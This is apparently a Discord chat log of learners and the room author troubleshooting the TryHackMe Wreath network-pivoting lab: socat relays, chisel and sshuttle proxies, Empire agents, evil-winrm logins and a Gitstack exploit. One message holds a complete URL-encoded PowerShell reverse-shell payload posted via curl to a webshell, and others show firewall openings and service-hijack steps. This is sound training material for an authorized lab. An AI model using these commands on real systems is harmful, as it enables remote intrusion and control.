#wreath-network

|| ```./socat-Ferrari404
./socat-Ferrari404: line 1: !DOCTYPE: No such file or directory
./socat-Ferrari404: line 2: syntax error near unexpected token newline' ./socat-Ferrari404: line 2: "http://www.w3.org/TR/html4/strict.dtd">'

it exists, why am I receiving this error?

It's chmod +x too

That would be because you downloaded the Github webpage

Not the actual tool

right click save as doesn't really work well with github

could've sworn I downloaded the binary, I'll try again

well from repositories anyway

you can check by running it on your system when you download it, it should return some usage prompts

I grabbed it from the tools folder actually

the one included in tools > cats >

Wait

WHAT

I might've accidentally done windows

I downloaded the wrong thing?

Nope

I think I did the /cats/windows one

since I thought I had to put it on .150

Nope, that one is also a binary

Weird, I definitely grabbed it from the tools folder. However, I tried using the linux one and it worked

maybe I messed it up when copying it

Maybe

At least the Linux one works

or did the wrong chmod

is the socat supposed to hang, does that mean its ready for me to run the ps

Yep, it is

Unless you background it

right, I didn't background it

Then yes, that's normal

So I set the port in the powershell to the one I'm listening on, and the IP to the .200?

or should it be my tun0

nvm i see

How are we supposed to enumerate the version of the vulnerable git app in the network? I reviewed the default pages source code and I can't find a version.

What do you mean by version?

If you search for the apps name on searchsploit, you will find 3 exploits. One with a version. I also thought its good practice to enumerate a apps version number before firing a exploit at it.

Anyone know what I'm doing wrong? nothing coming back in the listener.
|| On 10.200.72.200 using my ssh

firewall-cmd --zone=public --add-port 37683/tcp
success

On my vm

rlwrap nc -lvnp 38504
listening on [any] 38504 ...

On 10.200.72.200 using my ssh

./socat-Ferrari tcp-l:37683 tcp:10.50.73.55:38504 &

Launch from VM

curl -X POST -d "a=powershell.exe%20-c%20%22$client%20=%20New-Object%20System.Net.Sockets.TCPClient('10.200.72.200',%2037683);$stream%20=%20$client.GetStream();%5Bbyte%5B%5D%5D$bytes%20=%200..65535%7C%25%7B0%7D;while(($i%20=%20$stream.Read($bytes,%200,%20$bytes.Length))%20-ne%200)%7B;$data%20=%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString($bytes,0,%20$i);$sendback%20=%20(iex%20$data%202%3E&1%20%7C%20Out-String%20);$sendback2%20=%20$sendback%20+%20'PS%20'%20+%20(pwd).Path%20+%20'%3E%20';$sendbyte%20=%20(%5Btext.encoding%5D::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()%7D;$client.Close()%22" http://10.200.72.150/web/exploit-Ferrari404.php
"" ||

The section told me which exploit to use, but I also checked source for version and couldn't find it.

Ah, that exploit. Sorry, I thought you meant the literal code being downloaded from the git server for box three

😆 nope, the one for .150

So, yes, it's good practice to get the version number first. Sometimes it's not possible. I can't actually remember if it is or isn't for Gitstack

If it's not possible, then you make an educated guess

according to the login page its gitstack.

For example, the exploit targets one release down from the most up-to-date version, making the probability of it being one of the vulnerable versions very high

Ok. just was double checking that I didn't miss a enumeration step that would have revealed a version number.

That's also why reading the exploit is very important though. If it was dangerous then you'd be less likely to run it, but the worst that could happen there is that it doesn't work 🤷‍♂️

Nah -- you're good 😄

think imma just use the static netcat, cant figure this out

Oh man, that was difficult and confusing. But I got it:) the whole time, it was because I wasn't using burp. the powershell kept getting messed up with the site I was using to encode

gonna try it with socat now

Note: do not end your password with ! or evilwinrm will bug out for some reason

┌──(root💀kali)-[/home/…/Desktop/CTF/TryHackMe/Wreath]
└─# evil-winrm -u USERNAME -p "PASSWORD!" -i || 10.200.72.150 || 1 ⨯
dquote>

switching my password to not ending with ! fixed it though

Even when using single-quotes around evil-winrm -u Ferrari404 -p 'Maserati123!' -i 10.200.72.150?

not sure, I'll give it a try.

also, that was pretty close to my secure password xD

A question can be streamed while hacking this network?

@storm raven now that it's officially released, yes, you can stream it 🙂

Thats good

How long should it take a network to start up, I didn't hit extend. Currently at 11 mins

no rush, just curious

Less time than that

Two or three as a maximum

10.200.72 isn't pinging anything

that's not a valid ip

I'm also pretty sure you're not in the 72 subnet?

hmm most of previous pasted commands from Ferrari have been .72

You might be in the 72 subnet.

I'll try restarting vm to see if its on my end

If you are in the 72 subnet, I would suggest leaving the room and rejoining

Then downloading the new config

72 is my development network that you've been dumped into. There are more users in there than should be in there.

ah ok, I'm assuming I'll have to create another user etc?

Do you have the password hash for the Administrator?

No, I'll grab that real quick then leave

Anyone who faced this error when using the wreath ovpn file:
Cipher negotiation is disabled since neither P2MP client nor server mode is enabled

@merry robin I have a small question regarding empire part. The kali repo version seems buggy after starting listener and when stagger connects back from agent. Its just says 500 internal server error on prod-serv. empire spits back wrong type of data coming back from prod-serv. The docker version of powershell-empire works

without issue

however , I had to make some modifications to hosting the docker . Presistance storage etc. to make it usable . And then i saw http_hop ,but that has some minor annoyance which I will fix later.

and the task 20 with the powershell reverse shell , for me it never worked . Not even when bypassed that task end tried to run the revshell within rdp

how do you stop the machine after completing some task??

i get agent back but i can't seem to execute commands they all are queued up

also i had to make base64 encoding false for stagers cause i was not getting agents back

Which task u r doing man?

29-30

I'm on task 22 rn

🙂

i am try again to see if it works

Best luck man

Ty i will try that

still agent does not produce output of command i think i will skip

Same

Or I might try another c2 server

🤔

hey could anyone help with task 33 please?

having difficulty figuring out where i should be running this chisel forward proxy from/correct syntax

Hello sorry to bother you. I have a couple of question related to the empire section.

@lusty glade what's up?

@restive trout ask away

ok, to enter a shell command, it seems I have to prepend with the shell keyword but I also noticed I could enter a shell command without it. Is there a difference between the 2?

I haven't tried it without the shell prefix. If it works, it works 🤷‍♂️
I would imagine not

try to get commands correct for the forward proxy to access port 80 on the final machine

from the windows box i've ran this command

Just for the record as well, BC-Sec have a Discord server which Coin linked to above:
https://discord.com/invite/P8PZPyf

That's a really good bet if things are breaking in Empire. The devs are absolutely awesome

then on my machine ive ran this command

@lusty glade that's because you've not added the .exe extension on the compromised machine

I would love to know why it's in the Administrator documents folder and called chisel rather than your username as well...

There are a lot of people in these networks, and those instructions are there to make it fair for everyone. Please follow them :)

@Muiri, ok thanks. Also in task 28, it's writtent "Empire agents can't be proxied with a socat relay..." but I'm currently using socat to forward things, so I don't understand

oh shit yea ill move that

@restive trout are you relaying the agent?

I will be impressed if you are, given it will be communicating with the wrong place

@Muiri, I believe I'm relaying the agent. In the listener instead of providing the address of my host, I provided the one of the compromised host on which I'm running socat.

And what's catching the agent?

@Muiri, I'm not sure to understand the question. The listener is running on my attacking machine however I changed the value of the Host parameter to http://<compromised_host>:<socat_listenport>

That might work for generating the stager, but I don't think it will actually catch anything, or be able to communicate back?

Actually, put it another way

Do you have a callback from it?

@Muiri, yes, I'm interacting with it

Huh. Who knew. Heck only knows how that's working, but if it works it works 🤷‍♂️

Well done 😄

ok, thanks 🙂

Oh, I'm curious

Try killing your sshuttle

Does it still work?

do i still need to be running a socat relay from the prod-serv?

im getting this error now im the window machines

@muiri, I'm not using sshuttle

@lusty glade did you upload the linux version?

I HATE MY LIFE

@restive trout ah, fair enough 👍

I'll take that as a yes @lusty glade

yasss

-.-

so i should just need the sshuttle running and the chisel client/server?

or do i need the socat relay on prod-serv ?

@restive trout I think the answer is probably something along the lines of "that's really not how it's meant to work, and I suspect it might cause problems down the line if there were more machines in the network or you needed to do any kind of lateral movement, but if it works here then hey, it works, right? 😁

So, maybe not recommended but you're quite correct -- it is apparently possible to catch an agent through a socat relay

That should do it, yep. The relay isn't necessary once you have a forward connection to the target

@merry robin, yeah probably. I'm not experienced enough with empire. I tried to use it a couple of years ago but I gave up 🙂

It's a really nice tool, with some big improvements inbound as well 👀

thank you they finally seem to be connected 😅

Yay!

Me again..... task 20, I altered the 43777 exploit on nano as directed.. put the python2 shebang, added my username to exploit.php in both instances, inserted the target IP (I used sshuttle before so, it’s the IP, by what the task says)
But when I try to run the exploit
./43777.py

I get the following
Traceback (most recent call last):
File “./43777.py”, line 18, in <module>
import requests
ImportError: No module named requests

I went to check it on nano again, line 18, it says import requests

What am I doing wrong this time. I feel so stupid to be stuck like that 😞

Thank you so much in advance for any guidance

@high totem you should the pip installer pip install requests

Just did but....

Requirement already satisfied:requests in /usr/bin/python3 etc etc etc

So it's installed for python3 but not python2

May I know how to install this for python2, please?

I tried to http_hop listeners but I'm unable to interact with the agent. I configured 2 listeners:

• GitServer on port 65000
• GitServerHop with GitServer as the redirect listener
  I copied the generated files on the compromised GitServer, I added a new firewall rule and I started the php server php -S 0.0.0.0:65000 >&/dev/null
  For the stager, I used GitServerHop as the listener and copied the output in a cmd shell.
  I get a call back from the agent but I'm unable to execute commands

@high totem, use the package manager of your distribution

chisel better watch itself!!!!

@lusty glade lol

It keeps saying requirement already satisfied

Tried to run the exploit again, got the same error as above.

Try python2 -m pip install requests

If that doesn't work, you can try the get-pip.py script (should still be online) then run the command I just gave you

Failing that, just put every print statement in brackets (e.g. print("test") rather than print "test") and change the shebang to python3

try the same command with python2.7

@merry robin Sorry to bother you again, do you have an idea of what I'm doing wrong?

@oblique oar python2 is just a symlink to 2.7 anyway. Makes no difference

yeah i thought so but for some reason that worked for me

@high totem try the get-pip.py script?

I will google that, thank you so much 😊

https://github.com/pypa/get-pip

What's up?

@Muiri I'm trying the http_hop thing. The agent connects back but I'm unable to interact with it

I described a little bit earlier the steps I took

Ah, that's an issue with Empire currently. Try updating Empire and if it still doesn't work, just leave it for now

hmm ok, I downloaded the latest version from BLSecurity's github repo

Ok, just leave it for now then. The fix will be merged soon, I'm sure 🙂

ok, thanks 🙂

last check is 3.7.2 the latest version available?

@high totem do this...and run the file with python3

Yes, I will do that. Thank you so much.

@high totem rather than cloning it, read the instructions in the readme

Replace #!/usr/bin/python2 with #!/usr/bin/python3 in your code 1st line

Can't believe I'm saying this, but it's worth having a working install of Python2 -- most python exploits are written in it, and converting them all is a pain

This one is an easy one to convert, all things considered.

I’m sorry.

Nothing to be sorry for! 😄

It's all a learning experience 🙂

@Muiri, last question please. In empire, a module is something that gets loaded by the agent on the remote host or is it something else?

Essentially, yes

It's code that's being loaded into memory through the agent and getting executed that way.

ok, thanks a lot. I thought for a while that a module was something that was getting loaded in the empire C2, lol. I'm so stupid 🙂

Then I go to line 45....

Are you running that in python2 or python3?

@high totem try specifying python2 get-pip.py?

Or convert it.
Ah, so, the format needs to go immediately after the quotation mark -- inside the print brackets

I just tried putting parentheses on every print to make it python3

There's your problem

The script is most likely meant to be run in Python 2

Some things aren't available in python3 and vice versa

But it won’t run in python2 here

Gimme a sec -- I'll upload a converted copy 🙂

print (“[+] Found user {}”.format username)
?

Looks good!

Put parenthesis around username

I feel so stupid
I need to learn python right now

.format(username)

Oh, yeah, other than parentheses around username

Thanks Jabba

Oh boy
So ...

It comes with time 🙂
Definitely worth learning though

Muiri, if you want to take a break I can convert the script for you.

Converted copy of the Gitstack script:

Oh, I already have one 😄

smhh

Hard worker

For us stupid n00bs who don’t know python
I thank you so much

Yeah yeah, I should get back to my day off 😆

You should!

Np 🙂
I'd suggest having a read through that to see where the differences are as well

I’m so sorry to bother you on your day off.

Great idea!

Np 😄
Let's be honest -- I'm a huge workaholic anyway

You are Muiri

If I could mute you, I would do it

-mute @merry robin 24h Get some rest

Unable to run the command: Can't use moderation commands on users ranked the same or higher than you

¯_(ツ)_/¯

Oh, wait, I can add it manually

Wow, you're even working to stop yourself stop working

smhhh

Hello i am not able to access to Wreath web host

For some reason, I am getting (since like half an hour ago) "No route to host" errors on ssh, nc & curl to the public server, but can access it over the browser. I am super confused. Any ideas how I can debug it?

Connected to the VPN?

Yes

The wreath one?

did the DNS thing?

Unable to ping 10.200.81.200

Traceroute stops at 10.50.82.1

So i am not able to hoy out if my network

Any similar indicent with you?

Hey I am having exactly rthe same problem

I can indeed not access it in my browser anymore either, it was cached content -.-

Now i am happy

https://tenor.com/view/willem-dafoe-laugh-crazy-car-close-up-gif-12180194

So maybe there is a problem?

Well, I guess its time to go hack somewhere else ...

Routing problem?

THM problem, since 1 hour ago it was working fine

Yes

but nothing works for me alone ??

I was starting with it

Top, please be patient. Your problem will not be fixed within 10 minutes.

I refreshing yo acces web site and boommmm

Jabba do you know something about this problems?

Has the network gone to sleep by any mischance @lapis yacht..?

In my case its says its running

here the same situation

I vote to reset but only my vote

Are you both on the same network?

No, I am in 83 and he is in 81

10.50.82

oh ok

sorry

And it was working before?

82&83

83 was working yes

Naw, it's 81 and 83

all day, and ysterday night

The VPN packs are one subnet up from the network they access

no me on 82

@fair breach could you check those networks for me please?

Not if your VPN pack says 82 you aren't

You're also pinging 81

Thanks for the fast reaction Muiri. I am enjoying the room a lot so far, amazing work.

sorry you mean the server

this is the ip of the web server

but i am on 10.52.82

only for info

Yeah, it's the target subnet that matters 🙂

I don't know why there's that offset

ok sorry

Np!

in my case I am not able to get out of my subet

the firts spot does not seem to be alive or nor responding

Sorry 10.50.82.1 is up

something has changed i think

.1 is to do with AWS

finally finished! really enjoyed it

Lemme login to AWS real quick

thanks to everyone involved

10.200.82.* & 10.200.83.* aye?

10.200.81.

.82 is up .83 isn't

200 is down?

neither is .81

Ok, so 81 and 83 are down -- that explains something

What one are you on @potent urchin?

Would I be right in thinking you can't restart them or force a reset?

i just started and i can't process the first server

not work

Are you connected to the VPN?

Not for wreath unfortunately 😦

Can Skidy?

yesss

yep, i'm connected

afaik

Whats your IP?

@limber rover could you possible reset/restart the 81 and 83 subnets?

Whatever brings 'em back online

I can launch & terminate not reboot or shutdown kek

even then idk how''d that play up with the front end so I don't wanna tocuh it

I should be able the ping the first box, right ?

PING 10.200.83.200 (10.200.83.200) 56(84) bytes of data.
From 10.50.84.1 icmp_seq=1 Destination Host Unreachable```

You should

But that's one of the subnets I just asked Skidy to restart because it's down

Yep, I know that feeling

so that explains the dest host unreachable error ?

Yep

ah ok thanks

Not sure why it's down, but Skidy will bring it back up 🙂

👍

Please someone in the same network ping me when it gets back up, thanks

Thanks

Users should now be able to "start" the network which will bring all the machines back up

yup, its up thanks

Could they not already?

They were "already" up

Oh, he might have just shut it down properly, I see now

no not work

the start button does not work

I have ping but...

able to scan ports and get results

but...

The wreath network is up. I have a shell.

There are several networks

Hello,
I have a problem connecting to the lab wreath.
I can't ping the machine anymore, it happened suddenly.
I have tried several things:

• regeneration of a VPN package -> NOK
• reboot the machine -> NOK
• check processes to see if there were two VPN instances running -> NOK
  The state of the lab is correct though.

post here the destination final IP os the web server

We have some issues with this and they are working on it

all ip

This is the IP 10.200.92.200

Ok thanks

I reach the server but after putting in my host file the ip and name not able to reach the web but "working" with 10.200.81.200 in the browser...

On my side, it doesn't work even with DNS resolution.

but in my case that they have fixed it, it is very strange behavoir

ummmm

Yes, it's clear.
I was able to work on the first 16 tasks without any problems and now nothing.

same for 3/4 more users here in chat

Okay, I'll wait in that case 🙂

after gaining access to the first target using any command in the pseudoshell gives me a lot of exceptions like these below :

# id
Unhandled exception in event loop:
  File "/usr/lib/python3.9/asyncio/events.py", line 80, in _run
    self._context.run(self._callback, *self._args)
  File "/usr/lib/python3/dist-packages/prompt_toolkit/input/vt100.py", line 168, in callback_wrapper
    callback()
. . .

Exception [Errno 13] Permission denied: 'commands.txt'
Press ENTER to continue...uid=REDACTED 
context=system_u:system_r:initrc_t:s0
WARNING: your terminal doesn't support cursor position requests (CPR).

is this a problem on my side or on yours?

maybe the version of python?

Looks like you downloaded the exploit to a folder you don't have write access to

What OS are you using as well?

I have downloaded the latest Kali image just for the Wreath. Then I tried to apply some knowledge from Hardening Basics room and forgot I'm not running on my working Kali version. 😁 You are absolutely right about the write permissions.

For me it is solved also I have a # in the hosts files....XD

thanks

I cant access to the network

Are you a subscriber or currently have a 7 day streak?

I am having the same issue, i have a 7 day streak, also if I go in the access tab it says i am connected to the wreath network, and Network State is running, but i can not ping the machine, ip is 10.200.92.200

did the network die?

can't access it anymore

@merry robin Looks like it might be down again?

Which one?

no idea

Which subnet are you on?

10.200.93.0/24

93

Again

@fair breach is that one down?

tried remaking my ovpn key and got the same IP back

Yeah, there have been one or two issues with 91,92 and 93 today for some reason

@merry robin saw you added the "please clean up after your done question"

Yeah -- figured it might be necessary

Not a question related to the network, but when we have a windows machine x64 is it recommended to install nmap normally, or still using the static version?

Using ||sshuttle|| cant seem to use the ||id_rsa|| to authenticate with the key my syntax is ||--ssh-cmd "ssh -i root_id_rsa"|| but i get ||Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
c : fatal: c : failed to establish ssh session (2)||

ssh key is broken for some reason

the key it's self or the auth_key file

that has the public key in it

On your host?

Either way, static nmap for Windows doesn't really exist

The network is back up then?

No, i mean on the target machine

@ember solstice Which subnet?

83

@merry robin still looks down

Could you disconnect and send me your VPN pack in a DM please?

How's the key broken then?

the id_rsa works with ssh

Oh, it works with ssh but not sshuttle?

yes

@merry robin @ember solstice was asking about the key was replying to him

or her idk

also the network is still down

D:

Oh, I see

Now that is very odd

( @limber rover 93 seems to be down again)

Ok, could you disconnect and DM me the pack?

sure

@merry robin may I ask how long a network reboot takes?

need two more resets

Not long. 5 minutes at the absolute maximum

Anyone know why I'm getting this? ```* Starting Empire SocketIO on port: 5000
<frozen importlib._bootstrap>:228: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject
<frozen importlib._bootstrap>:228: RuntimeWarning: greenlet.greenlet size changed, may indicate binary incompatibility. Expected 144 from C header, got 152 from PyObject

• Starting Empire RESTful API on port: 1337

[1] + segmentation fault ./empire --headless```

Occurs when I try to run starkiller, no options for listeners in gui. Empire CLI works fine

That's log from my ./empire --headless &

I'm gonna suggest asking over in the BC-Sec discord for that one 🙂

says failed to connect to socket io

https://discord.com/invite/P8PZPyf

I realized I had to make a listener for the redirect to connect to.

okay so im doing the wreath room now i try to cat the id_rsa but its blank for some reason am i missing something

@merry robin Someone broke your network again

same for me, issue still exists (ssh -i ....)

Someone's probably broken the box

Make sure the public key is in authorized_keys

it's not empty

You are likely to be on different networks

It can be blank, if someone broke it.

Disconnect and send me the config file please 🙂

@wet tapir if you can ssh into the box using the id_rsa, and you’re using the right syntax and still having problems, Muiri should help you

$ ||ssh -i ./id_rsa root@10.200.99.200||
root@10.200.99.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

-> id_rsa and id_rsa pub on the server has a timestamp of today (did somebody mess with those), and the id_rsa.pub ends with root@kali, differs from authorized_keys

Yes, someone has been messing with it

Please disconnect from the network and DM me your config file @wet tapir. I can fix manually

And if I find out who's doing that, I will ban them -- either from the room or the site, depending on my mood

(Just in case anyone's watching who thinks the trolling is anything other than selfish and pathetic 🤷‍♂️)

Is 10.200.108.200 down?

I can't ping it and all of the nmap scans I've tried aren't returning anything

Is the network started?

Yes it is running

Are you on the right connection pack?

Yup, double checked that already

It is giving me an IP in the 10.50.109.0/24 subnet though

is that right?

Yep, that's correct

Question is, is anyone awake to see if it's active

What ip exactly do you have @stone ivy?

10.50.109.9

So not a new subnet. Hm.

If it shows as running but isn't, try going for a reset -- others will do the same if something is up with it

I suspect the admins are asleep (and I've already pinged 'em a good 20 times today troubleshooting), so there's no easy way to check from the back end just now

Sounds good. I appreciate your help. I voted for a reset and we'll see if we happens

*what

Hopefully that'll fix it. Lemme know if it hasn't got the votes to reset and I'll check in the morning. Need some sleep just now 😆

I finally understand sshuttle! I've been manually running ssh port forwards the whole day into the network and over complicating my pivots like an idiot 😂. Now to go over my lab report notes and grab new screenshots with the new configurations and edit.
I feel like sshuttle should be moved to the first pivot task in the room to stress it's simplicity and importance.

This is the description of this room

Learn how to pivot through a network by compromising a public facing web machine and tunnelling your traffic to access other machines in Wreath's network. (Streak limitation only for non-subscribed users)

What does the streak limitation part mean?

Can I only access it for certain days?

I think it means if your a non subscriber you need to have a 7 day answer streak to join and access to the network.

Not to maintain

Just to join.

Ah great!

yes ;_;

hey, with the final pivot, im struggling a bit. so my situation is I have my home machine (windows, burp suite) connected to the attack box via ssh -D 8228. the attack box is connected to .200 via sshuttle. back on my host, with burp using a 8228 as a socks proxy, i can browse gitstack through the attack box, easy

i have evil-winrm onto .150, and can setup win-chisel there, and even setup a proxy between the attack box and .150, say on port 1088

but... i guess my brain fail is, how would i use the burp proxy browser from my host, through the socks proxy to the attack box, through the chisel proxy to .150, in order to hit .100?

feel free to say 'hey, go read this doc on chaining proxies BRO' if thats what i should be doing

So bit update . I built the empire from source and it’s working now without an issue . However when trying to run the agent payload on gitserv it’s keeps breaking after connection established

And before that I had similar issues with the power shell revshell

Which step than I bypassed for that reason

Hello everybody.
I have a problem running socat on the target,
[root@prod-serv tmp]# ./socat-zarandija: error while loading shared libraries: libwrap.so.0: cannot open shared object file: No such file or directory
Can someone give me a hand?

I don't think you're using a static socat binary

I'm going to check out that possibility man, thnks.

They provided a link to download static binaries, download socat from there and transfer that to the box

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

That was the problem, thank you very much for the help.👍

I can't seem to get a respond back from my agent on GIT server 🧐

Hi, I can't access the prod-serv........

Network is running but I can't seem to reach the prod-serv...

@charred fern leave and rejoin the network (then redownload the VPN pack). You're currently in the dev subnet

Muiri, Wreath is being mean and making me develop a port scanner 😦 Now I'm looking up RFCs to figure out what to shove in the socket connection because I don't like half-arsing these things

Why are you developing a port scanner..?

to figure out where the other machines are

yes bash

alright. thanks

the port scanner bit I already have, but it's the ping sweep bit I need

Why not use nmap/Invoke-Portscan.ps1?

no nmap on the web server

Or the oneliners there? 😆

Stick a static copy up

because I'm a dev and it's a fun challenge

and it can be useful for other things

Don't blame me then
You're being mean to yourself 🤣

😛

You just described the essence of hacking: being mean to yourself 😄

True

hey,

Iam trying to upload a nc to the linux first machine

but seem like it not working

I got the binary from the attackbox once and from github

any advice ?

Not working in what sense?

Looks like something wrong with the binary

That ain't a binary

You've downloaded the github webpage by accident 🙂

Make sure you get the link to the raw file, rather than the page itself

my mistake this is the error

So, that would indicate that you're using a dynamic binary -- not a static one

ahhh, so I have to look for static one

Mhm -- try the one in the tools zipfile if github isn't doing it for you 🙂

Thank you so much, btw great network so far

Just added a more expanded note on static binaries into the Enumeration task 🙂

great, something new to learn thank you again

Np, enjoy!

Hey, people on .83 are you guys able to load|| /resorces|| on .100 ?

mine just keeps hanging

After entering the creds that is

yep, i think someones messing with it since now it doesn't even accept the creds (401)

@merry robin could you take a look at this please ?

Yeah -- you still on the same VPN pack @ember solstice?

Yes, should i disconnect ?

Please 🙂

sorry for my questions,
what could the problem be if I can connect via
xfreerdp /v:ip /u:user /p:pass

but when try to get share it didnt work
xfreerdp /v:ip/u:user /p:pass +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,rumbleshare

What's the error?

[14:22:45:581] [28563:28563] [ERROR][com.winpr.commandline] - Failed at index 6 [/drive:/usr/share/windows-resources,rumbleshare]: PostFilter rule could not be applied

FreeRDP - A Free Remote Desktop Protocol Implementation
See www.freerdp.com for more information

Try it the other way around @high dirge

/drive:rumbleshare,/usr/share/windows-resources

still the same

Try it with the current directory as a test?

as in /drive:.,share

The other thing that can sometimes cause problems with it apparently are permissions, so try doing it as root as well

this work as charm

There we go then 🙂

this smiley face, scare me LOL

Heh, it's better than my usual 😁

😁 is a great emoji. It can be anything from really happy, to incredibly threatening, depending on the context

so the mistake I did was that I don't have the shred /usr/windows... in my machine yes ?

Hello all

I’m getting the very same thing, and I downloaded the nc from the task

Which link?

Might have accidentally stuck a non-raw one in

If you don't mind I have a couple of questions, the room author refers to the fact that AV uses sandboxes for malware detection. My question is how close are those sandboxes to the Virtual Machines that we use (for instance virtualbox). Does the AV have an hypervisor with hardware virtualization and a full operating system installed on it or is it something else?

I clicked on netcat, downloaded it, renamed it adding my username, and I’m getting the same error as the person above

That link should be giving the binary itself

Odd

I even did the same thing he did.... goggled netcat static binary, went to github, downloaded it from there, tried again, very same error

can you screenshot the error?

Well, that's definitely a webpage. Interesting

That’s the second, from github....

Try the one in the tools zipfile?

This one is the first, from the task

The errors are the same

I don’t have the netcat in the tools. Nmap only

Netcat is in the tools zipfile in the cats directory

In the tools we downloaded when we started the network

I’ll try this one then.... sorry, found it

Np 🙂
Give it a shot

Not working 😢

Got exactly the same thing

That indicates that the upload to the target isn't working. What's your webserver showing?

Uh

What are you trying to do here?

I’m on task 20

Ok, that looks good. Are you trying to upload netcat to get a shell back?

Yes

Ok, so show me the Python webserver serving it?

But after downloading it from the task, then from github, then from the tools I downloaded at the beginning of the network, I keep getting the exact same error

So, that's the problem

It's 404'ing

404ing?

See in the log there, the code 404?

That indicates File not found

Yes

Stop the webserver and do ls?

Yes, I did it

All three recent nc are there

Can you show me?

Ok, so it's not called nc, the file you're trying to upload

So when you're doing curl, you'll need to use the full file name

The task asks us to rename, yes? Using our usernames

Yep, but you'll need to upload it using whatever it's actually called

So try starting the webserver again, then grabbing it with curl http://10.50.107.8/nc-tzipi -o nc-tzipi

I have a question related to smb authentication. Does smb require mutual authentication? I tried to copy a file without enabling the -user and the -password option and it just failed, despite the server returning a successful authentication message to the client

Then show me the webserver output 🙂

Ahhhhhhhhhhhhhhhhh

Mutual authentication?

yes, by that I mean the client has to authenticate and the server has also to prove that he knows the secret.

It shouldn't do, afaik

the "net use" command didn't work without the -user and -password options on the server

So that is to do with the settings on the Windows server

Default Windows Server 2019 won't allow connections without authentication

I hope this is correct....
I found my mistake.... the python web server was being done in the wrong directory

I got both the nc and the web server in the same place....

It’s 12:30 at night here and I’m doing this after working 10 hours operating industrial machines....

I apologize for the stupidity

Not at all -- it happens

You've seen it once now, so you'll know for next time. That's the important bit! 😄

Oh I’ll never forget this experience..... I’m learning a lot... trying not to give up!
Now I can hopefully go on and not bother you anymore for the night!!!!!!

Thank you so much again 😊

Anytime 🙂

@Muiri, Does it mean that it tries first to connect without authentication and if it's successful it disconnects? I'm having a hard time understanding.

Essentially, net use lets you configure connections to shared resources. If there's no authentication then you can just skip that bit entirely because there's no configuration necessary -- you can just connect directly. If you try to connect without specifying the credentials, the user account on Windows tries to connect using it's own credentials, which are denied obviously.

Iam facing another issue

I have made a chisel connection and all ok and I did forward it to port and get the connect (task 33)
but when I try to reach the webapp on (||.100|| host) I cant

So the connection was successful if you didn't use net use first, but the authentication was not

Are you connecting through proxychains/foxyproxy?

foxyproxy

What error are you getting?

just got it, get scared and remember things I read in pivot section ty

Well done! 🙂

Ahaha, why the worried face?

cause of this 🙂
😂 😂 😂

🙂

yo

hate to be that guy

but I am getting failed to connect in task 6 for the CVE

I still didn't test any other exploits outside the one coded by the one and only Muiri

What IP? And can you ping it?

10.200.111.200

I cant ping it but when I visit the dns it works

that's why I was like something's wrong

didn't reset it

" yet "

There isn't any DNS in there. Did you add anything to your hosts?

I added thomaswreath.thm

so we can enumerate and so on

So, that's why it's connecting to the box

Can you connect to port 10000 on it?

nope

We needed to add a DNS in the previous lecture tho

It was adding a line to your hosts file. DNS isn't something we control as hackers

Could you disconnect from the VPN and DM me the config file?

sure thing

I'll have a look at the box and make sure it's all working 🙂

sent

Muiri = Problems solved ! Thanks boss

Just finished it. Amazing. Definitely will play it again in the future and do all the bonus questions that I skipped this time XD

@merry robin Sorry to bother you again. I did some tests and basically the client stops the connection when the server doesn't sign the message. The signature requires the server to know the user password hash.

Hey, hopefully my last question regarding this Network haha, I can't stop the || service || on .100:
||sc stop SystemExplorerHelpService
sc stop SystemExplorerHelpService
[SC] ControlService FAILED 1052:

The requested control is not valid for this service.||

It says I have 9 days of access left. Does that mean I have to finish Wreath in that time?

You can rejoin after that time expires

Okay, perfect! Thank you

It's mostly so that people don't take spaces up in networks when they're not working on Wreath

But the network state might get reset during the time block, or after being 'evicted', right? I.e. backdoors you install/configs you change would be reset

Yeah the network might be reset during those 10 days. Important to keep notes.
When you rejoin, I don't think you'll get put onto the same network.

thanks. I'm gonna start on it tomorrow

Thought maybe because other people were doing the priv esc part it was throwing an error but im still getting the same error.

hey,
Iam in the last few tasks and when I try to stop the services on the win I got this error

Same

what could it be ?

@merry robin
sorry for bothering you, but if you can help 🙂

Are you on .83 ?

yay

yeah same

so its an issue in the network we are in ?

Maybe

so what do you think we should do

Probably wait for Muiri to take a look at it

welp there goes all my connections chisel died on me

Maybe we should vote for a reset @high dirge

sure

just 2/8 will not do the job

I don't know what else we can do but wait, either for a reset or for Muiri

I finished all other tasks and trying to keep my connection

yep, i just need Administrators NTLM hash

Try deleting the System.exe binary and starting the service to reset it. That should happen every 5 minutes anyway

my listener after a while LOL

did you mange to get it working ?

nope seem like I will give up and get the hash from dark video 😦

Which subnet is this?

.83

.83

Ok. Could you possibly disconnect @ember solstice? (Apologies, I know it's a lot of pivoting to get back). I'll go in and reset it manually

Oh, actually, I can get it to send you a shell straight back on a timer after sorting it

sure, Thanks

done

I have got to get a management interface sorted smh

what should we do ?

Nothing for now. I'm just fixing it

tyt thank you

Should be fixed, if you wanna go for it

@ember solstice just setting up a reverse shell for ya

Thanks 😆

Or not. Forgot about defender

Oh, but

it is I can stop and restart it but cant get rev shell odd

Have you checked your wrapper is working?

how can I ?
i did exactly what in the tasks

Muiri should i connect back ?

@ember solstice Apologies -- you are going to have to go back through it. I can't set up a task to send a shell back without breaking the way it's set up 😦

Yeah -- connect back though 🙂

Its alright, i've bugged you enough hehe, thanks for fixing

Try just running the wrapper with your own account and see if it connects back?

it work and give me the same shell (thomas) but when I do the sc stop and start nothing happen

||whoami
whoami
nt authority\system|| 😄

that fast ohh Congrats 🔥 😃

good notes help get back to where you were quickly

haha thanks still have to get the hash

Sounds like that might have been because Cyb3ri0us overwrote your shell 😆

Try copying it in then restarting the service once more?

are you doing a youtube for the room @ember solstice

Worked Thanks for all Muiri, ||you are a hero for creating such a network ||, pleasure to know you and thanks for all the help.

You are most welcome! 😄

Oh im sorry,

Nae worries 😄

Everyone's got there in the end

Maybe 👀

Finished ! Again, Muiri this is like the 3rd time im telling you but this was super awesome, thanks for putting it together

hello?

